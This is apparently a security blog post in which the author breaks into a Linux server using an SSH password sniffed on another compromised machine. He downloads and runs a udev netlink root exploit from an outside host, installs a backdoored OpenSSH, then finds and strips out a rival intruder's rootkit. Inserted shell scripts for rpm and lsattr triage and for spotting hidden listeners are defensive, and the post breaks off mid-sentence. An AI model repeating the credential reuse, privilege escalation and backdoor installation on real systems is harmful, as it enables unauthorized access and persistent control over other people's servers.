Linux intrusion: a simple manual intrusion check on a compromised Linux box

by:vitter
blog:blog.securitycn.net

Today, on one of the compromised boxes, I found that someone had ssh'd from it to another server and the password had been captured:
[root@mail ~]# cat /tmp/sshpswd
ldc:[email protected]
Just ssh straight in with it:
[root@mail ~]# ssh [email protected]
[email protected]'s password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r on an \m

[ldc@localhost .v]$ wget http://211.100.50.70/u.sh
--13:21:09--  http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3366 (3.3K) [application/x-sh]
Saving to: `u.sh'

100%[=>] 3,366       --.-K/s   in 0.04s  

13:21:09 (93.7 KB/s) - `u.sh' saved [3366/3366]

[ldc@localhost .v]$ ls
r00t    r00t.c  u.sh
[ldc@localhost .v]$ chmod +x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
f69f8800 0   2486   00000111 0        0        00000000 2
f7fdae00 0   0      00000000 0        0        00000000 2
c2132200 6   0      00000000 0        0        00000000 2
f6a57a00 7   2143   00000001 0        0        00000000 2
f7caf000 7   0      00000000 0        0        00000000 2
f6a0be00 9   2143   00000000 0        0        00000000 2
f6a61200 9   1996   00000000 0        0        00000000 2
f7de1c00 9   0      00000000 0        0        00000000 2
f7d6ca00 10  0      00000000 0        0        00000000 2
f7fb3200 11  0      00000000 0        0        00000000 2
c2154200 15  476    ffffffff 0        0        00000000 2
f7fdac00 15  0      00000000 0        0        00000000 2
f7fb3000 16  0      00000000 0        0        00000000 2
c21cde00 18  0      00000000 0        0        00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root       477  0.0  0.0  2916 1396 ?        S<   12:36   0:00 /sbin/udevd -d
ldc       3462  0.0  0.0  4128  680 pts/0    S    13:00   0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'

sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:Low-High

Now we are root. The argument handed to u.sh, 476, comes from /proc/net/netlink: the socket with Eth 15 (NETLINK_KOBJECT_UEVENT, the uevent channel udevd listens on) has Pid 476, the netlink identity of the udevd that ps lists as PID 477. The script compiles a small suid.c helper, hence the gcc warning, abuses udev's netlink uevent handling to run it as root, and drops into the sh-3.1# shell with uid 0.

sh-3.1# w
13:25:18 up 48 min,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
ldc      pts/0    100.204.107.20    13:05    0.00s  0.12s  0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006

First, leave ourselves an SSH backdoor. The box runs OpenSSH 4.3p2, so a matching patched source tree is fetched from the same host as the exploit, built, and installed over the system binaries:

sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
--13:32:08--  http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 979990 (957K) [application/x-gzip]
Saving to: `openssh4.3p2.tar.gz'

100%[=>] 979,990     1.14M/s   in 0.8s  

13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]

sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc... gcc
checking for C compiler default output file name... a.out
............(several lines omitted)

sh-3.1# make && make
conffile=`echo sshd_config.out | sed 's/.out$//'`; \
        /bin/sed -e 's|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g' -e
............(several lines omitted)

sh-3.1# cp ssh_config sshd_config /etc/ssh/
sh-3.1# /etc/rc.d/init.d/sshd restart
鍋滄 sshd锛                                              [纭畾]
鍚姩 sshd锛                                              [纭畾]

OK, now log in through our sshdoor:

[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:Low-High

[root@localhost ~]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name  
tcp        0      0 127.0.0.1:2208              0.0.0.0:*                   LISTEN      2298/hpiod          
tcp        0      0 0.0.0.0:1000                0.0.0.0:*                   LISTEN      2090/rpc.statd      
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      2056/portmap        
tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      2883/vsftpd        
tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2315/cupsd          
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2361/sendmail: acce    
tcp        0      0 127.0.0.1:2207              0.0.0.0:*                   LISTEN      2303/python            

Something about this system feels off: netstat does not even show port 22, which we just logged in through, so netstat itself has probably been replaced. Let's first check whether other system files have been swapped out. rpm -qaV (the same as rpm -Va) verifies every installed package's files against the rpm database, comparing size, digest, owner, group and mtime, and it uses rpm's own digest code rather than /usr/bin/md5sum:

[root@localhost ~]# rpm -qaV
S.5..UG.   /bin/netstat
S.5..UG.   /sbin/config
S.5....T   /usr/bin/ssh-keygen
S.5....T c /etc/sysconfig/system-config-securitylevel
S.5..UG.   /usr/sbin/lsof
.M......   /var/tux
S.5....T c /etc/inittab
S.5....T   /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_dl14.map
S.5....T   /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_ndl14.map
S.5....T   /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_dl14.map
S.5....T   /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_ndl14.map
S.5....T   /usr/share/texmf-var/web2c/aleph.fmt
S.5....T   /usr/share/texmf-var/web2c/amstex.fmt
S.5....T   /usr/share/texmf-var/web2c/bamstex.fmt
S.5....T   /usr/share/texmf-var/web2c/bplain.fmt
S.5....T   /usr/share/texmf-var/web2c/cont-en.fmt
S.5....T   /usr/share/texmf-var/web2c/etex.fmt
..5....T   /usr/share/texmf-var/web2c/metafun.mem
S.5....T   /usr/share/texmf-var/web2c/mf.base
..5....T   /usr/share/texmf-var/web2c/mpost.mem
S.5....T   /usr/share/texmf-var/web2c/mptopdf.fmt
S.5....T   /usr/share/texmf-var/web2c/omega.fmt
S.5....T   /usr/share/texmf-var/web2c/pdfetex.fmt
S.5....T   /usr/share/texmf-var/web2c/pdftex.fmt
S.5....T   /usr/share/texmf-var/web2c/tex.fmt
.......T c /etc/kdump.conf
S.5....T c /etc/prcap
..5....T c /etc/pki/nssdb/secmod.db
....L... c /etc/pam.d/system-auth
.M...... c /etc/cups/es.conf
.......T c /etc/audit/auditd.conf
missing     /usr/sbin/nscd
S.5....T c /etc/sysconfig/named
.M......   /var/named
SM5..UG.   /bin/ps
SM5..UG.   /usr/bin/top
SM5....T c /etc/sysconfig/iptables-config
S.5..UG.   /usr/bin/find
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?.....   /usr/lib/libGL.so.1.2
S.5....T c /etc/ppp/chap-secrets
S.5....T c /etc/ppp/pap-secrets
S.5....T c /etc/xml/catalog
S.5....T c /usr/share/sgml/docbook/xmlcatalog
S.5....T c /etc/ssh/ssh_config
S.5....T   /usr/bin/scp
S.5....T   /usr/bin/sftp
S.5....T   /usr/bin/ssh
S.5....T   /usr/bin/ssh-add
SM5...GT   /usr/bin/ssh-agent
S.5....T   /usr/bin/ssh-keyscan
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/builtin35.map
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/download35.map
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/ps2pk.map
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_pk.map
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_t1.map
S.5....T   /etc/sgml/docbook-slides.cat
S.5....T   /usr/share/icons/hicolor/icon-theme.cache
S.5..UG.   /bin/ls
S.5..UG.   /usr/bin/dir
S.5..UG.   /usr/bin/md5sum
S.5..UG.   /usr/bin/pstree
S.5....T c /etc/syslog.conf
S.5....T c /etc/ssh/sshd_config
S.5....T   /usr/sbin/sshd
missing     /var/lib/texmf/ls-R
S.5....T   /etc/sgml/docbook-simple.cat
S.5....T c /etc/vsftpd/vsftpd.conf
.M......   /var/ftp/pub
S.5....T c /etc/mailcap
......G.   /var/cache/samba/winbindd_privileged
.......T c /etc/mail/sendmail.cf
SM5....T c /etc/mail/submit.cf
S.5....T c /var/log/mail/statistics
..5....T c /usr/lib/security/path.security
S.5....T c /etc/sane.d/dll.conf

Reading the flags: S means the size differs, M the mode, 5 the MD5 digest, U and G the owner and group, T the mtime; a leading c marks a config file, and "missing" is self-explanatory. The entries that matter are /bin/netstat, /bin/ps, /bin/ls, /usr/bin/dir, /usr/bin/top, /usr/bin/find, /usr/bin/md5sum, /usr/bin/pstree and /usr/sbin/lsof: size, digest and ownership changed but the mtime column is clean (S.5..UG.), which is what a rootkit installer that preserves timestamps leaves behind. The md5sum entry also means any checksum taken with the system's own md5sum is worthless. The ssh, scp, sftp, ssh-keygen, sshd and /etc/ssh/*_config entries with S.5....T are our own OpenSSH install from a few minutes ago.

Luckily rpm itself was not replaced. Quite a few system commands have been, though; heh, a fellow intruder is already on this box. Sorry, but I am going to have to kick you off. Before checking any further, this system's own commands obviously cannot be trusted, so first put trustworthy copies back:

[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
cp: cannot remove `/usr/bin/dir': Operation not permitted

chattr has been used to set the i (immutable), a (append-only) and u (undeletable) attributes on it; the immutable bit is what makes cp fail with "Operation not permitted" even as root, so the attributes have to be cleared first:

[root@localhost bin]# chattr -iau /usr/bin/dir
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir

OK. Now let's see what else has been locked down the same way (note that grep -e -ia matches the literal string "-ia"; it works here because every one of these files has both attributes set, but it would miss a file with only i or only a):

[root@localhost chkrootkit-0.48]# lsattr /bin /sbin /usr/bin /usr/sbin /etc| grep -e -ia
s---ia------- /bin/ps
s---ia------- /bin/ls
s---ia------- /bin/netstat
s---ia------- /sbin/config
s---ia------- /sbin/ttymon
s---ia------- /sbin/ttyload
s---ia------- /usr/bin/top
s---ia------- /usr/bin/md5sum
s---ia------- /usr/bin/pstree.x11
s---ia------- /usr/bin/find
s---ia------- /usr/bin/dir
s---ia------- /usr/bin/pstree
s---ia------- /usr/sbin/lsof
s---ia------- /usr/sbin/ttyload
s---ia------- /etc/sh.conf
[root@localhost bin]# chattr -iau ps ls netstat
[root@localhost bin]# rm -rf ps ls netstat
[root@localhost bin]# rz
rz waiting to receive.
[root@localhost bin]# chmod +x ps ls netstat
[root@localhost bin]# chattr +iau ps ls netstat

Replace /usr/sbin/lsof, /usr/bin/find and the rest the same way. The clean copies were pushed up with rz (ZMODEM over the terminal session); take them from a trusted install of the same release and package version, never from anything already on the compromised box.
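The two checks run above, rpm -V for content that changed and lsattr for files locked against replacement, are worth scripting so the verify flags are decoded mechanically and the two results can be joined. The following is an added example, not code from the original post; the function names (rpm_va_triage, lsattr_locked, cross_check) are made up here and every sample line is constructed from the listings on this page.

```shell
#!/bin/sh
# Added example, not code from the original post: decode `rpm -Va` and
# `lsattr` output mechanically and join the two views. Function names and
# sample lines are constructed here (the samples mirror the listings above).

# rpm_va_triage: read `rpm -Va` output on stdin and print
#   <path> <flags> <notes>
# for package-owned files under the system bin/sbin/lib directories whose
# content can no longer be trusted. RHEL 5's rpm prints an 8-column flag
# field (S size, M mode, 5 MD5 digest, D device, L link, U user, G group,
# T mtime; "." unchanged, "?" could not verify), an optional type letter
# (c = config file), then the path. Config files are skipped because they
# legitimately differ. A digest change with the T column still clean is
# flagged: an upgrade or rebuild updates the mtime, a rootkit copied in
# with preserved timestamps does not.
rpm_va_triage() {
    awk '
    BEGIN { ndirs = split("/bin/ /sbin/ /usr/bin/ /usr/sbin/ /lib/ /usr/lib/ /usr/libexec/", dirs, " ") }
    function in_sysdir(p,   i) {
        for (i = 1; i <= ndirs; i++) if (index(p, dirs[i]) == 1) return 1
        return 0
    }
    $1 == "missing" { if (in_sysdir($2)) print $2, "missing", "file-removed"; next }
    length($1) != 8 || $1 !~ /^[SM5DLUGT.?]+$/ { next }   # prelink chatter, blank lines
    {
        flags = $1; type = (NF == 3) ? $2 : ""; path = $NF
        if (type == "c" || type == "g") next                # config and ghost files
        if (!in_sysdir(path)) next
        d = substr(flags, 3, 1)
        if (d == "?") { print path, flags, "digest-unverifiable"; next }
        if (d != "5") next
        notes = "content-changed"
        if (substr(flags, 8, 1) != "T") notes = notes ",mtime-preserved"
        if (substr(flags, 6, 1) == "U" || substr(flags, 7, 1) == "G") notes = notes ",owner-changed"
        print path, flags, notes
    }'
}

# lsattr_locked: read `lsattr` output on stdin and print "<path> <letters>"
# for every file with the immutable (i) or append-only (a) attribute set.
# Letters are located by value, not by column, because their position in
# the attribute string differs between e2fsprogs versions, and a plain
# `grep -e -ia` only matches when the two letters happen to be adjacent.
lsattr_locked() {
    awk '
    NF >= 2 && $1 ~ /^[-A-Za-z]+$/ {
        attrs = $1; path = substr($0, length(attrs) + 2)   # keeps spaces in paths
        lock = ""
        if (index(attrs, "i")) lock = lock "i"
        if (index(attrs, "a")) lock = lock "a"
        if (lock != "") print path, lock
    }'
}

# cross_check: $1 = rpm_va_triage output, $2 = lsattr_locked output.
# A file that is both locked and content-changed is the pattern on this box;
# a locked file rpm still considers clean is either deliberate hardening or
# something rpm does not own, and deserves a look before it is touched.
cross_check() {
    awk -v f="$1" '
    BEGIN { while ((getline l < f) > 0) { split(l, x, " "); changed[x[1]] = x[3] } }
    { print $1, (($1 in changed) ? "replaced+locked " changed[$1] : "locked-only") }' "$2"
}

# Demonstration on constructed lines taken from the listings above.
rpm_out=$(mktemp); attr_out=$(mktemp)
rpm_va_triage > "$rpm_out" <<'EOF'
S.5..UG.   /bin/netstat
SM5..UG.   /bin/ps
S.5....T   /usr/sbin/sshd
S.5....T c /etc/ssh/sshd_config
missing     /usr/sbin/nscd
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?.....   /usr/lib/libGL.so.1.2
EOF
lsattr_locked > "$attr_out" <<'EOF'
s---ia------- /bin/ps
s---ia------- /bin/netstat
s---ia------- /sbin/ttyload
----i-------- /etc/shadow
EOF
cross_check "$rpm_out" "$attr_out"
rm -f "$rpm_out" "$attr_out"
```

On the box itself the pipeline is `rpm -Va | rpm_va_triage > /tmp/changed`, `lsattr -R /bin /sbin /usr/bin /usr/sbin /etc 2>/dev/null | lsattr_locked > /tmp/locked`, then `cross_check /tmp/changed /tmp/locked` (the /tmp paths are just placeholders). Keep in mind that rpm, awk and lsattr are themselves binaries from the suspect system; the reason to lean on rpm -V at all is that it carries its own digest code, which matters once /usr/bin/md5sum shows up in the changed list as it does above.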
Now look at the ports again with the restored netstat:
[root@localhost bin]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name  
tcp        0      0 127.0.0.1:2208              0.0.0.0:*                   LISTEN      2298/hpiod          
tcp        0      0 0.0.0.0:1000                0.0.0.0:*                   LISTEN      2090/rpc.statd      
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      2056/portmap        
tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      2883/vsftpd        
tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2315/cupsd          
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2361/sendmail: acce
tcp        0      0 0.0.0.0:65530               0.0.0.0:*                   LISTEN      2663/ttyload
tcp        0      0 127.0.0.1:2207              0.0.0.0:*                   LISTEN      2303/python
tcp        0      0 :::22                       :::*                        LISTEN      13935/sshd

There it is: ttyload (PID 2663) listening on 0.0.0.0:65530, the entry the trojaned netstat was filtering out, and port 22 is visible again. /sbin/ttyload, /usr/sbin/ttyload, /sbin/ttymon and /etc/sh.conf were also among the immutable files lsattr turned up above, so they belong to the same kit.
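Reading the kernel's socket table directly is the quicker way to catch what a trojaned netstat hides, and it works before a single binary has been replaced. This is an added example rather than code from the post; the function names proc_tcp_listeners and hidden_tcp_listeners, and the sample /proc/net/tcp and netstat listings, are constructed (the 65530 entry mirrors the ttyload listener found above).

```shell
#!/bin/sh
# Added example, not code from the original post: list listening TCP sockets
# from the kernel's own table instead of the netstat binary, then diff them
# against what netstat reports. Function names and sample listings are
# constructed; the 65530 entry mirrors the ttyload listener found above.

# proc_tcp_listeners: print "<addr>:<port> uid=<uid> inode=<inode>" for each
# LISTEN-state socket in a /proc/net/tcp or /proc/net/tcp6 style file
# ($1, default /proc/net/tcp). Addresses and ports are hex; an IPv4 address
# is stored in host byte order, so on x86 its bytes come out reversed.
# State 0A is TCP_LISTEN. A userland rootkit that swaps netstat and lsof
# filters their output but leaves this file alone (a kernel-module rootkit
# could hide entries here as well).
proc_tcp_listeners() {
    awk '
    function hex2dec(h,   i, v) {
        v = 0
        for (i = 1; i <= length(h); i++)
            v = v * 16 + index("0123456789ABCDEF", toupper(substr(h, i, 1))) - 1
        return v
    }
    function hex2ip4(h) {
        return hex2dec(substr(h, 7, 2)) "." hex2dec(substr(h, 5, 2)) "." hex2dec(substr(h, 3, 2)) "." hex2dec(substr(h, 1, 2))
    }
    NR > 1 && $4 == "0A" {
        split($2, a, ":")
        if (length(a[1]) == 8) addr = hex2ip4(a[1])
        else addr = (a[1] ~ /^0+$/) ? "[::]" : "[" a[1] "]"   # IPv6 left as raw hex
        print addr ":" hex2dec(a[2]), "uid=" $8, "inode=" $10
    }' "${1:-/proc/net/tcp}"
}

# hidden_tcp_listeners: $1 = file holding `netstat -lnt` output,
# $2 = /proc/net/tcp-style file. Prints the kernel listeners whose port is
# missing from the netstat listing, i.e. what the installed netstat hides.
hidden_tcp_listeners() {
    proc_tcp_listeners "$2" | awk -v ns="$1" '
    BEGIN {
        while ((getline line < ns) > 0) {
            if (line !~ /LISTEN/) continue
            split(line, f, " "); p = f[4]; sub(/.*:/, "", p)   # port after the last colon
            seen[p] = 1
        }
    }
    { p = $1; sub(/.*:/, "", p); if (!(p in seen)) print "hidden", $0 }'
}

# Demonstration on constructed data: a kernel table carrying the ttyload
# port and a netstat listing that omits it.
proc=$(mktemp); ns=$(mktemp)
cat > "$proc" <<'EOF'
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:FFFA 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9123 1 f7a3c000 300 0 0 2 -1
   1: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 8854 1 f7a3c400 300 0 0 2 -1
   2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9001 1 f7a3c800 300 0 0 2 -1
   3: 0100007F:0019 0100007F:C3A1 01 00000000:00000000 00:00000000 00000000     0        0 9420 1 f7a3cc00 20 4 30 10 -1
EOF
cat > "$ns" <<'EOF'
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN
tcp        0      0 :::22                       :::*                        LISTEN
EOF
proc_tcp_listeners "$proc"
hidden_tcp_listeners "$ns" "$proc"
rm -f "$proc" "$ns"
```

On a live system call proc_tcp_listeners with no argument (and once more with /proc/net/tcp6), save `netstat -lnt` to a file and feed both to hidden_tcp_listeners. The inode printed for a hidden socket can be tied to its process without lsof: `ls -l /proc/[0-9]*/fd/* 2>/dev/null | grep 'socket:\[9123\]'` (9123 being whichever inode you got) names the /proc/<pid>/fd entry that owns it, which on the box above would have pointed at ttyload even while ps and lsof were still trojaned, provided ls itself had already been restored.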

Now run chkrootkit and rkhunter over it as well and see what they find:

[root@loca